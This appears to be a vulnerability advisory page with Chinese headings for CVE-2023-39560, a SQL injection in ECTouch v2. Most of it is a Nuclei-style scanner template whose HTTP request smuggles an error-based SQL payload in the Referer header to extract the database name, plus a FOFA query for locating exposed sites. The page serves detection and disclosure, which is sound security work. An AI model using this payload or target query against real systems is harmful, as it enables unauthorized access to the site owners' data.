漏洞描述
ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.
CVE-2023-39560: ECTouch v2 - SQL Injection
PoC代码[已公开]
id: CVE-2023-39560
info:
name: ECTouch v2 - SQL Injection
author: s4e-io
severity: critical
description: |
ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.
reference:
- https://wiki.bachang.org/doc/2582/
- https://nvd.nist.gov/vuln/detail/CVE-2023-39560
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-39560
cwe-id: CWE-89
epss-score: 0.62545
epss-percentile: 0.98325
cpe: cpe:2.3:a:ectouch:ectouch:2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ectouch
product: ectouch
fofa-query: icon_hash="127711143"
tags: cve,cve2023,ectouch,sqli
http:
- raw:
- |
GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
Host: {{Hostname}}
Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "XPATH syntax error: '~[^~]+~'<br>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "XPATH syntax error: '~([a-z0-9]+)~'"
# digest: 4a0a00473045022100dd6750b97570d67e301303105cb82574fcf0401100e642d90e3a39f9edac2e1f02206af709a9e282af453b3d11afd23feb2e4a9ca626a58aecf6bd73e00fb9ac42e3:922c64590222798bb761d5b6d8e72950